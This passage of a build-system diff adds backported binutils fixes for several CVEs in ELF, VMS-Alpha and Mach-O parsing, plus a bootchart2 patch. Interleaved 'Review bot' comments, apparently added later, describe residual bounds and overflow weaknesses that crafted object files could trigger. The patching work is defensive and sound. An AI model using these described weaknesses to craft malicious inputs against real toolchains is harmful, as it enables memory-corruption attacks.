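+ && bfd_get_flavour (bfd_asymbol_bfd (b)) == bfd_target_elf_flavour)
+- {
+- bfd_vma asz, bsz;
+-
+- asz = 0;
+- if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
+- asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
+- bsz = 0;
+- if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
+- bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
+- if (asz != bsz)
+- return asz > bsz ? -1 : 1;
+- }
++ bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
++ if (asz != bsz)
++ return asz > bsz ? -1 : 1;
+
+ /* Symbols that start with '.' might be section names, so sort them
+ after symbols that don't start with '.'. */
+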
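diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
new file mode 100644
index 0000000000..f41c02a02b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
@@ -0,0 +1,49 @@
+From 75393a2d54bcc40053e5262a3de9d70c5ebfbbfd Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Wed, 21 Dec 2022 11:51:23 +0000
+Subject: [PATCH] Fix an attempt to allocate an unreasonably large amount of
+ memory when parsing a corrupt ELF file.
+
+ PR 29924
+ * objdump.c (load_specific_debug_section): Check for excessively
+ large sections.
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=75393a2d54bcc40053e5262a3de9d70c5ebfbbfd]
+CVE: CVE-2022-48063
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/ChangeLog | 6 ++++++
+ binutils/objdump.c | 4 +++-
+ 2 files changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/ChangeLog b/binutils/ChangeLog
+index e7f918d3f65..020e09f3700 100644
+--- a/binutils/ChangeLog
++++ b/binutils/ChangeLog
+@@ -1,3 +1,9 @@
++2022-12-21 Nick Clifton <nickc@redhat.com>
++
++ PR 29924
++ * objdump.c (load_specific_debug_section): Check for excessively
++ large sections.
++
+ 2021-02-11 Alan Modra <amodra@gmail.com>
+
+ PR 27290
+
+diff --git a/binutils/objdump.c b/binutils/objdump.c
+index d51abbe3858..2eb02de0e76 100644
+--- a/binutils/objdump.c
++++ b/binutils/objdump.c
+@@ -3479,7 +3479,9 @@
+ section->size = bfd_section_size (sec);
+ /* PR 24360: On 32-bit hosts sizeof (size_t) < sizeof (bfd_size_type). */
+ alloced = amt = section->size + 1;
+- if (alloced != amt || alloced == 0)
++ if (alloced != amt
++ || alloced == 0
++ || (bfd_get_size (abfd) != 0 && alloced >= bfd_get_size (abfd)))
+ {
+ section->start = NULL;
+ free_debug_section (debug);
+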
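Review bot: The added bound in load_specific_debug_section compares the section's in-memory size with the on-disk file size, which is only a safe upper limit for uncompressed sections. If bfd_section_size reports the decompressed size of a compressed debug section, a small object with highly compressible debug info could be rejected as corrupt; that case should be excluded or at least documented in a comment next to the test. bfd_get_size is also called twice in the condition; reading it once into a local, `ufile_ptr filesize = bfd_get_size (abfd);`, would make the test easier to follow. The function body extends beyond the hunk on both sides.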
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
new file mode 100644
index 0000000000..732ea43210
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
@@ -0,0 +1,530 @@
1CVE: CVE-2023-25584
2Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.34-6ubuntu1.7.debian.tar.xz upstream https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=77c225bdeb410cf60da804879ad41622f5f1aa44 ]
3Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
4
5[Ubuntu note: this is backport of the original patch, no major changes just
6 fix this patch for this release]
7From 77c225bdeb410cf60da804879ad41622f5f1aa44 Mon Sep 17 00:00:00 2001
8From: Alan Modra <amodra@gmail.com>
9Date: Mon, 12 Dec 2022 18:28:49 +1030
10Subject: [PATCH] Lack of bounds checking in vms-alpha.c parse_module
11
12 PR 29873
13 PR 29874
14 PR 29875
15 PR 29876
16 PR 29877
17 PR 29878
18 PR 29879
19 PR 29880
20 PR 29881
21 PR 29882
22 PR 29883
23 PR 29884
24 PR 29885
25 PR 29886
26 PR 29887
27 PR 29888
28 PR 29889
29 PR 29890
30 PR 29891
31 * vms-alpha.c (parse_module): Make length param bfd_size_type.
32 Delete length == -1 checks. Sanity check record_length.
33 Sanity check DST__K_MODBEG, DST__K_RTNBEG, DST__K_RTNEND lengths.
34 Sanity check DST__K_SOURCE and DST__K_LINE_NUM elements
35 before accessing.
36 (build_module_list): Pass dst_section size to parse_module.
37---
38 bfd/vms-alpha.c | 213 ++++++++++++++++++++++++++++++++++++++----------
39 1 file changed, 168 insertions(+), 45 deletions(-)
40
41--- binutils-2.34.orig/bfd/vms-alpha.c
42+++ binutils-2.34/bfd/vms-alpha.c
43@@ -4267,7 +4267,7 @@ new_module (bfd *abfd)
44
45 static void
46 parse_module (bfd *abfd, struct module *module, unsigned char *ptr,
47- int length)
48+ bfd_size_type length)
49 {
50 unsigned char *maxptr = ptr + length;
51 unsigned char *src_ptr, *pcl_ptr;
52@@ -4284,7 +4284,7 @@ parse_module (bfd *abfd, struct module *
53 curr_line = (struct lineinfo *) bfd_zalloc (abfd, sizeof (struct lineinfo));
54 module->line_table = curr_line;
55
56- while (length == -1 || ptr < maxptr)
57+ while (ptr < maxptr)
58 {
59 /* The first byte is not counted in the recorded length. */
60 int rec_length = bfd_getl16 (ptr) + 1;
61@@ -4292,15 +4292,19 @@ parse_module (bfd *abfd, struct module *
62
63 vms_debug2 ((2, "DST record: leng %d, type %d\n", rec_length, rec_type));
64
65- if (length == -1 && rec_type == DST__K_MODEND)
66+ if (rec_length > maxptr - ptr)
67+ break;
68+ if (rec_type == DST__K_MODEND)
69 break;
70
71 switch (rec_type)
72 {
73 case DST__K_MODBEG:
74+ if (rec_length <= DST_S_B_MODBEG_NAME)
75+ break;
76 module->name
77 = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_MODBEG_NAME,
78- maxptr - (ptr + DST_S_B_MODBEG_NAME));
79+ rec_length - DST_S_B_MODBEG_NAME);
80
81 curr_pc = 0;
82 prev_pc = 0;
83@@ -4314,11 +4318,13 @@ parse_module (bfd *abfd, struct module *
84 break;
85
86 case DST__K_RTNBEG:
87+ if (rec_length <= DST_S_B_RTNBEG_NAME)
88+ break;
89 funcinfo = (struct funcinfo *)
90 bfd_zalloc (abfd, sizeof (struct funcinfo));
91 funcinfo->name
92 = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_RTNBEG_NAME,
93- maxptr - (ptr + DST_S_B_RTNBEG_NAME));
94+ rec_length - DST_S_B_RTNBEG_NAME);
95 funcinfo->low = bfd_getl32 (ptr + DST_S_L_RTNBEG_ADDRESS);
96 funcinfo->next = module->func_table;
97 module->func_table = funcinfo;
98@@ -4328,6 +4334,8 @@ parse_module (bfd *abfd, struct module *
99 break;
100
101 case DST__K_RTNEND:
102+ if (rec_length < DST_S_L_RTNEND_SIZE + 4)
103+ break;
104 module->func_table->high = module->func_table->low
105 + bfd_getl32 (ptr + DST_S_L_RTNEND_SIZE) - 1;
106
107@@ -4358,13 +4366,66 @@ parse_module (bfd *abfd, struct module *
108
109 vms_debug2 ((3, "source info\n"));
110
111- while (src_ptr < ptr + rec_length)
112+ while (src_ptr - ptr < rec_length)
113 {
114 int cmd = src_ptr[0], cmd_length, data;
115
116 switch (cmd)
117 {
118 case DST__K_SRC_DECLFILE:
119+ if (src_ptr - ptr + DST_S_B_SRC_DF_LENGTH >= rec_length)
120+ cmd_length = 0x10000;
121+ else
122+ cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
123+ break;
124+
125+ case DST__K_SRC_DEFLINES_B:
126+ cmd_length = 2;
127+ break;
128+
129+ case DST__K_SRC_DEFLINES_W:
130+ cmd_length = 3;
131+ break;
132+
133+ case DST__K_SRC_INCRLNUM_B:
134+ cmd_length = 2;
135+ break;
136+
137+ case DST__K_SRC_SETFILE:
138+ cmd_length = 3;
139+ break;
140+
141+ case DST__K_SRC_SETLNUM_L:
142+ cmd_length = 5;
143+ break;
144+
145+ case DST__K_SRC_SETLNUM_W:
146+ cmd_length = 3;
147+ break;
148+
149+ case DST__K_SRC_SETREC_L:
150+ cmd_length = 5;
151+ break;
152+
153+ case DST__K_SRC_SETREC_W:
154+ cmd_length = 3;
155+ break;
156+
157+ case DST__K_SRC_FORMFEED:
158+ cmd_length = 1;
159+ break;
160+
161+ default:
162+ cmd_length = 2;
163+ break;
164+ }
165+
166+ if (src_ptr - ptr + cmd_length > rec_length)
167+ break;
168+
169+ switch (cmd)
170+ {
171+ case DST__K_SRC_DECLFILE:
172 {
173 unsigned int fileid
174 = bfd_getl16 (src_ptr + DST_S_W_SRC_DF_FILEID);
175@@ -4384,7 +4445,6 @@ parse_module (bfd *abfd, struct module *
176
177 module->file_table [fileid].name = filename;
178 module->file_table [fileid].srec = 1;
179- cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
180 vms_debug2 ((4, "DST_S_C_SRC_DECLFILE: %d, %s\n",
181 fileid, module->file_table [fileid].name));
182 }
183@@ -4401,7 +4461,6 @@ parse_module (bfd *abfd, struct module *
184 srec->sfile = curr_srec->sfile;
185 curr_srec->next = srec;
186 curr_srec = srec;
187- cmd_length = 2;
188 vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_B: %d\n", data));
189 break;
190
191@@ -4416,14 +4475,12 @@ parse_module (bfd *abfd, struct module *
192 srec->sfile = curr_srec->sfile;
193 curr_srec->next = srec;
194 curr_srec = srec;
195- cmd_length = 3;
196 vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_W: %d\n", data));
197 break;
198
199 case DST__K_SRC_INCRLNUM_B:
200 data = src_ptr[DST_S_B_SRC_UNSBYTE];
201 curr_srec->line += data;
202- cmd_length = 2;
203 vms_debug2 ((4, "DST_S_C_SRC_INCRLNUM_B: %d\n", data));
204 break;
205
206@@ -4431,21 +4488,18 @@ parse_module (bfd *abfd, struct module *
207 data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
208 curr_srec->sfile = data;
209 curr_srec->srec = module->file_table[data].srec;
210- cmd_length = 3;
211 vms_debug2 ((4, "DST_S_C_SRC_SETFILE: %d\n", data));
212 break;
213
214 case DST__K_SRC_SETLNUM_L:
215 data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
216 curr_srec->line = data;
217- cmd_length = 5;
218 vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_L: %d\n", data));
219 break;
220
221 case DST__K_SRC_SETLNUM_W:
222 data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
223 curr_srec->line = data;
224- cmd_length = 3;
225 vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_W: %d\n", data));
226 break;
227
228@@ -4453,7 +4507,6 @@ parse_module (bfd *abfd, struct module *
229 data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
230 curr_srec->srec = data;
231 module->file_table[curr_srec->sfile].srec = data;
232- cmd_length = 5;
233 vms_debug2 ((4, "DST_S_C_SRC_SETREC_L: %d\n", data));
234 break;
235
236@@ -4461,19 +4514,16 @@ parse_module (bfd *abfd, struct module *
237 data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
238 curr_srec->srec = data;
239 module->file_table[curr_srec->sfile].srec = data;
240- cmd_length = 3;
241 vms_debug2 ((4, "DST_S_C_SRC_SETREC_W: %d\n", data));
242 break;
243
244 case DST__K_SRC_FORMFEED:
245- cmd_length = 1;
246 vms_debug2 ((4, "DST_S_C_SRC_FORMFEED\n"));
247 break;
248
249 default:
250 _bfd_error_handler (_("unknown source command %d"),
251 cmd);
252- cmd_length = 2;
253 break;
254 }
255
256@@ -4486,7 +4536,7 @@ parse_module (bfd *abfd, struct module *
257
258 vms_debug2 ((3, "line info\n"));
259
260- while (pcl_ptr < ptr + rec_length)
261+ while (pcl_ptr - ptr < rec_length)
262 {
263 /* The command byte is signed so we must sign-extend it. */
264 int cmd = ((signed char *)pcl_ptr)[0], cmd_length, data;
265@@ -4494,10 +4544,106 @@ parse_module (bfd *abfd, struct module *
266 switch (cmd)
267 {
268 case DST__K_DELTA_PC_W:
269+ cmd_length = 3;
270+ break;
271+
272+ case DST__K_DELTA_PC_L:
273+ cmd_length = 5;
274+ break;
275+
276+ case DST__K_INCR_LINUM:
277+ cmd_length = 2;
278+ break;
279+
280+ case DST__K_INCR_LINUM_W:
281+ cmd_length = 3;
282+ break;
283+
284+ case DST__K_INCR_LINUM_L:
285+ cmd_length = 5;
286+ break;
287+
288+ case DST__K_SET_LINUM_INCR:
289+ cmd_length = 2;
290+ break;
291+
292+ case DST__K_SET_LINUM_INCR_W:
293+ cmd_length = 3;
294+ break;
295+
296+ case DST__K_RESET_LINUM_INCR:
297+ cmd_length = 1;
298+ break;
299+
300+ case DST__K_BEG_STMT_MODE:
301+ cmd_length = 1;
302+ break;
303+
304+ case DST__K_END_STMT_MODE:
305+ cmd_length = 1;
306+ break;
307+
308+ case DST__K_SET_LINUM_B:
309+ cmd_length = 2;
310+ break;
311+
312+ case DST__K_SET_LINUM:
313+ cmd_length = 3;
314+ break;
315+
316+ case DST__K_SET_LINUM_L:
317+ cmd_length = 5;
318+ break;
319+
320+ case DST__K_SET_PC:
321+ cmd_length = 2;
322+ break;
323+
324+ case DST__K_SET_PC_W:
325+ cmd_length = 3;
326+ break;
327+
328+ case DST__K_SET_PC_L:
329+ cmd_length = 5;
330+ break;
331+
332+ case DST__K_SET_STMTNUM:
333+ cmd_length = 2;
334+ break;
335+
336+ case DST__K_TERM:
337+ cmd_length = 2;
338+ break;
339+
340+ case DST__K_TERM_W:
341+ cmd_length = 3;
342+ break;
343+
344+ case DST__K_TERM_L:
345+ cmd_length = 5;
346+ break;
347+
348+ case DST__K_SET_ABS_PC:
349+ cmd_length = 5;
350+ break;
351+
352+ default:
353+ if (cmd <= 0)
354+ cmd_length = 1;
355+ else
356+ cmd_length = 2;
357+ break;
358+ }
359+
360+ if (pcl_ptr - ptr + cmd_length > rec_length)
361+ break;
362+
363+ switch (cmd)
364+ {
365+ case DST__K_DELTA_PC_W:
366 data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
367 curr_pc += data;
368 curr_linenum += 1;
369- cmd_length = 3;
370 vms_debug2 ((4, "DST__K_DELTA_PC_W: %d\n", data));
371 break;
372
373@@ -4505,131 +4651,111 @@ parse_module (bfd *abfd, struct module *
374 data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
375 curr_pc += data;
376 curr_linenum += 1;
377- cmd_length = 5;
378 vms_debug2 ((4, "DST__K_DELTA_PC_L: %d\n", data));
379 break;
380
381 case DST__K_INCR_LINUM:
382 data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
383 curr_linenum += data;
384- cmd_length = 2;
385 vms_debug2 ((4, "DST__K_INCR_LINUM: %d\n", data));
386 break;
387
388 case DST__K_INCR_LINUM_W:
389 data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
390 curr_linenum += data;
391- cmd_length = 3;
392 vms_debug2 ((4, "DST__K_INCR_LINUM_W: %d\n", data));
393 break;
394
395 case DST__K_INCR_LINUM_L:
396 data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
397 curr_linenum += data;
398- cmd_length = 5;
399 vms_debug2 ((4, "DST__K_INCR_LINUM_L: %d\n", data));
400 break;
401
402 case DST__K_SET_LINUM_INCR:
403 _bfd_error_handler
404 (_("%s not implemented"), "DST__K_SET_LINUM_INCR");
405- cmd_length = 2;
406 break;
407
408 case DST__K_SET_LINUM_INCR_W:
409 _bfd_error_handler
410 (_("%s not implemented"), "DST__K_SET_LINUM_INCR_W");
411- cmd_length = 3;
412 break;
413
414 case DST__K_RESET_LINUM_INCR:
415 _bfd_error_handler
416 (_("%s not implemented"), "DST__K_RESET_LINUM_INCR");
417- cmd_length = 1;
418 break;
419
420 case DST__K_BEG_STMT_MODE:
421 _bfd_error_handler
422 (_("%s not implemented"), "DST__K_BEG_STMT_MODE");
423- cmd_length = 1;
424 break;
425
426 case DST__K_END_STMT_MODE:
427 _bfd_error_handler
428 (_("%s not implemented"), "DST__K_END_STMT_MODE");
429- cmd_length = 1;
430 break;
431
432 case DST__K_SET_LINUM_B:
433 data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
434 curr_linenum = data;
435- cmd_length = 2;
436 vms_debug2 ((4, "DST__K_SET_LINUM_B: %d\n", data));
437 break;
438
439 case DST__K_SET_LINUM:
440 data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
441 curr_linenum = data;
442- cmd_length = 3;
443 vms_debug2 ((4, "DST__K_SET_LINE_NUM: %d\n", data));
444 break;
445
446 case DST__K_SET_LINUM_L:
447 data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
448 curr_linenum = data;
449- cmd_length = 5;
450 vms_debug2 ((4, "DST__K_SET_LINUM_L: %d\n", data));
451 break;
452
453 case DST__K_SET_PC:
454 _bfd_error_handler
455 (_("%s not implemented"), "DST__K_SET_PC");
456- cmd_length = 2;
457 break;
458
459 case DST__K_SET_PC_W:
460 _bfd_error_handler
461 (_("%s not implemented"), "DST__K_SET_PC_W");
462- cmd_length = 3;
463 break;
464
465 case DST__K_SET_PC_L:
466 _bfd_error_handler
467 (_("%s not implemented"), "DST__K_SET_PC_L");
468- cmd_length = 5;
469 break;
470
471 case DST__K_SET_STMTNUM:
472 _bfd_error_handler
473 (_("%s not implemented"), "DST__K_SET_STMTNUM");
474- cmd_length = 2;
475 break;
476
477 case DST__K_TERM:
478 data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
479 curr_pc += data;
480- cmd_length = 2;
481 vms_debug2 ((4, "DST__K_TERM: %d\n", data));
482 break;
483
484 case DST__K_TERM_W:
485 data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
486 curr_pc += data;
487- cmd_length = 3;
488 vms_debug2 ((4, "DST__K_TERM_W: %d\n", data));
489 break;
490
491 case DST__K_TERM_L:
492 data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
493 curr_pc += data;
494- cmd_length = 5;
495 vms_debug2 ((4, "DST__K_TERM_L: %d\n", data));
496 break;
497
498 case DST__K_SET_ABS_PC:
499 data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
500 curr_pc = data;
501- cmd_length = 5;
502 vms_debug2 ((4, "DST__K_SET_ABS_PC: 0x%x\n", data));
503 break;
504
505@@ -4638,15 +4764,11 @@ parse_module (bfd *abfd, struct module *
506 {
507 curr_pc -= cmd;
508 curr_linenum += 1;
509- cmd_length = 1;
510 vms_debug2 ((4, "bump pc to 0x%lx and line to %d\n",
511 (unsigned long)curr_pc, curr_linenum));
512 }
513 else
514- {
515- _bfd_error_handler (_("unknown line command %d"), cmd);
516- cmd_length = 2;
517- }
518+ _bfd_error_handler (_("unknown line command %d"), cmd);
519 break;
520 }
521
522@@ -4778,7 +4900,7 @@ build_module_list (bfd *abfd)
523 return NULL;
524
525 module = new_module (abfd);
526- parse_module (abfd, module, PRIV (dst_section)->contents, -1);
527+ parse_module (abfd, module, PRIV (dst_section)->contents, PRIV (dst_section)->size);
528 list = module;
529 }
530
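Review bot: The record header in `parse_module` is still read before any length check. The loop condition becomes `while (ptr < maxptr)`, but `bfd_getl16 (ptr)` and the record-type read that follows it (just outside the hunk) need more than one byte, and `if (rec_length > maxptr - ptr)` only runs after those reads. A DST section whose final record header is truncated can therefore still be read past `maxptr`; assuming the type is a 16-bit field at `ptr + 2`, tightening the loop to `while (ptr + 3 < maxptr)` would close that. Separately, the `DST__K_RTNEND` case dereferences `module->func_table` after only a length check, which looks like a NULL dereference when no `DST__K_RTNBEG` record came first; `if (module->func_table == NULL) break;` ahead of the assignment would cover it. The body of `parse_module` extends beyond the hunks shown, so both points should be confirmed against the full function.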
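--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
@@ -0,0 +1,149 @@
+From d12f8998d2d086f0a6606589e5aedb7147e6f2f1 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 14 Oct 2022 10:30:21 +1030
+Subject: [PATCH] PR29677, Field `the_bfd` of `asymbol` is uninitialised
+
+Besides not initialising the_bfd of synthetic symbols, counting
+symbols when sizing didn't match symbols created if there were any
+dynsyms named "". We don't want synthetic symbols without names
+anyway, so get rid of them. Also, simplify and correct sanity checks.
+
+ PR 29677
+ * mach-o.c (bfd_mach_o_get_synthetic_symtab): Rewrite.
+---
+Upstream-Status: Backport from [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=d12f8998d2d086f0a6606589e5aedb7147e6f2f1]
+CVE: CVE-2023-25588
+CVE: CVE-2022-47696
+
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+Signed-off-by: poojitha adireddy <pooadire@cisco.com>
+
+ bfd/mach-o.c | 72 ++++++++++++++++++++++------------------------------
+ 1 file changed, 31 insertions(+), 41 deletions(-)
+
+diff --git a/bfd/mach-o.c b/bfd/mach-o.c
+index acb35e7f0c6..5279343768c 100644
+--- a/bfd/mach-o.c
++++ b/bfd/mach-o.c
+@@ -938,11 +938,9 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ bfd_mach_o_symtab_command *symtab = mdata->symtab;
+ asymbol *s;
+ char * s_start;
+- char * s_end;
+ unsigned long count, i, j, n;
+ size_t size;
+ char *names;
+- char *nul_name;
+ const char stub [] = "$stub";
+
+ *ret = NULL;
+@@ -955,27 +953,27 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ /* We need to allocate a bfd symbol for every indirect symbol and to
+ allocate the memory for its name. */
+ count = dysymtab->nindirectsyms;
+- size = count * sizeof (asymbol) + 1;
+-
++ size = 0;
+ for (j = 0; j < count; j++)
+ {
+- const char * strng;
+ unsigned int isym = dysymtab->indirect_syms[j];
++ const char *str;
+
+ /* Some indirect symbols are anonymous. */
+- if (isym < symtab->nsyms && (strng = symtab->symbols[isym].symbol.name))
+- /* PR 17512: file: f5b8eeba. */
+- size += strnlen (strng, symtab->strsize - (strng - symtab->strtab)) + sizeof (stub);
++ if (isym < symtab->nsyms
++ && (str = symtab->symbols[isym].symbol.name) != NULL)
++ {
++ /* PR 17512: file: f5b8eeba. */
++ size += strnlen (str, symtab->strsize - (str - symtab->strtab));
++ size += sizeof (stub);
++ }
+ }
+
+- s_start = bfd_malloc (size);
++ s_start = bfd_malloc (size + count * sizeof (asymbol));
+ s = *ret = (asymbol *) s_start;
+ if (s == NULL)
+ return -1;
+ names = (char *) (s + count);
+- nul_name = names;
+- *names++ = 0;
+- s_end = s_start + size;
+
+ n = 0;
+ for (i = 0; i < mdata->nsects; i++)
+@@ -997,47 +995,39 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ entry_size = bfd_mach_o_section_get_entry_size (abfd, sec);
+
+ /* PR 17512: file: 08e15eec. */
+- if (first >= count || last >= count || first > last)
++ if (first >= count || last > count || first > last)
+ goto fail;
+
+ for (j = first; j < last; j++)
+ {
+ unsigned int isym = dysymtab->indirect_syms[j];
+-
+- /* PR 17512: file: 04d64d9b. */
+- if (((char *) s) + sizeof (* s) > s_end)
+- goto fail;
+-
+- s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
+- s->section = sec->bfdsection;
+- s->value = addr - sec->addr;
+- s->udata.p = NULL;
++ const char *str;
++ size_t len;
+
+ if (isym < symtab->nsyms
+- && symtab->symbols[isym].symbol.name)
++ && (str = symtab->symbols[isym].symbol.name) != NULL)
+ {
+- const char *sym = symtab->symbols[isym].symbol.name;
+- size_t len;
+-
+- s->name = names;
+- len = strlen (sym);
+- /* PR 17512: file: 47dfd4d2. */
+- if (names + len >= s_end)
++ /* PR 17512: file: 04d64d9b. */
++ if (n >= count)
+ goto fail;
+- memcpy (names, sym, len);
+- names += len;
+- /* PR 17512: file: 18f340a4. */
+- if (names + sizeof (stub) >= s_end)
++ len = strnlen (str, symtab->strsize - (str - symtab->strtab));
++ /* PR 17512: file: 47dfd4d2, 18f340a4. */
++ if (size < len + sizeof (stub))
+ goto fail;
+- memcpy (names, stub, sizeof (stub));
+- names += sizeof (stub);
++ memcpy (names, str, len);
++ memcpy (names + len, stub, sizeof (stub));
++ s->name = names;
++ names += len + sizeof (stub);
++ size -= len + sizeof (stub);
++ s->the_bfd = symtab->symbols[isym].symbol.the_bfd;
++ s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
++ s->section = sec->bfdsection;
++ s->value = addr - sec->addr;
++ s->udata.p = NULL;
++ s++;
++ n++;
+ }
+- else
+- s->name = nul_name;
+-
+ addr += entry_size;
+- s++;
+- n++;
+ }
+ break;
+ default:
+--
+2.39.3
+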
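Review bot: The allocation size in `bfd_mach_o_get_synthetic_symtab` is computed without an overflow check. `bfd_malloc (size + count * sizeof (asymbol))` multiplies `count`, taken from `dysymtab->nindirectsyms`, in `size_t` arithmetic. On a host with a 32-bit `size_t` a large count could wrap and give a buffer smaller than the `count` symbol slots that the later `n >= count` guard assumes. Whether `nindirectsyms` is bounded earlier is not visible in these hunks, so this may be unreachable in practice. A guard before the call, such as `if (count > ((size_t) -1 - size) / sizeof (asymbol)) return -1;`, would make the sizing safe on its own terms. The function begins and ends outside the hunks shown.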
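--- /dev/null
+++ b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
@@ -0,0 +1,68 @@
+From 988ca784d4840c87509e770a21d5d22105af8668 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Fri, 5 Nov 2021 11:18:07 +0800
+Subject: [PATCH] bootchartd.in: make sure only one bootchartd process
+
+When boot with "init=/sbin/bootchartd" as below:
+ # runqemu qemux86 bootparams="init=/sbin/bootchartd"
+
+There are two bootchartd process after boot [1].
+ # ps -ef | grep bootchart
+root 101 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 103 101 8 03:27 ? 00:00:02 /lib64/bootchart/bootchart-collector 50
+root 106 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 792 106 0 03:27 ? 00:00:00 /lib64/bootchart/bootchart-collector --usleep 1000000
+root 794 725 0 03:27 ttyS0 00:00:00 grep bootchart
+
+ # /sbin/bootchartd stop
+[bootchart] bootchart-collector started as pid 596 with 2 args:
+[bootchart] '--dump'
+[bootchart] '/tmp/bootchart.3lXpVDAq3v'
+[bootchart] Extracting profile data from pid 204
+[bootchart] map 0xbed9a000 -> 0xbedbb000 size: 132k from 'bed9a000' 'bedbb000'
+[bootchart] read 135168 bytes of 135168
+[bootchart] reading 150 chunks (of 150) ...
+[bootchart] wrote 18760 kbB
+[bootchart] bootchart-collector pid: 596 unmounted proc / clean exit
+
+But there still one process exist after the above stop command finish.
+ # ps -ef | grep bootchartd
+root 202 1 0 09:09 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 629 516 0 09:10 ? 00:00:00 grep bootchartd
+
+Remove the wait_boot which used to wait the boot process to finish to
+make sure only one bootchartd process and meanwhile we don't need the
+wait_boot logic because we either use "/sbin/bootchartd stop" to stop
+the bootchartd manually or install package bootchartd-stop-initscript
+altogether with bootchart2 to stop bootchartd automatically after boot.
+
+After patch:
+ # ps -ef | grep bootchart
+ root 101 1 0 03:36 ? 00:00:00 /bin/sh /sbin/bootchartd
+ root 103 101 6 03:36 ? 00:00:04 /lib64/bootchart/bootchart-collector 50
+ root 596 592 0 03:37 ttyS0 00:00:00 grep bootchart
+
+[1] https://github.com/xrmx/bootchart/issues/94
+
+Upstream-Status: Submitted [https://github.com/xrmx/bootchart/pull/95]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ bootchartd.in | 1 -
+ 1 file changed, 1 deletion(-)
+
+diff --git a/bootchartd.in b/bootchartd.in
+index 7979ef9..f0e466d 100755
+--- a/bootchartd.in
++++ b/bootchartd.in
+@@ -183,7 +183,6 @@ if [ $$ -eq 1 ]; then
+ else # running inside the main system
+ echo "bootchart: no initrd used; starting"
+ start &
+- wait_boot &
+ # wait a little, until the collector is going, before allowing
+ # the rest of the system to charge ahead, so we catch it
+ $USLEEP 250000
+--
+2.17.1
+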
diff --git a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
index a938b2da49..7f05bd1b0b 100644
--- a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb
+++ b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
@@ -90,15 +90,15 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=44ac4678311254db62edf8fd39cb8124"
90 90
91UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)" 91UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)"
92 92
93SRC_URI = "git://github.com/xrmx/bootchart.git \ 93SRC_URI = "git://github.com/xrmx/bootchart.git;branch=master;protocol=https \
94 file://bootchartd_stop.sh \ 94 file://bootchartd_stop.sh \
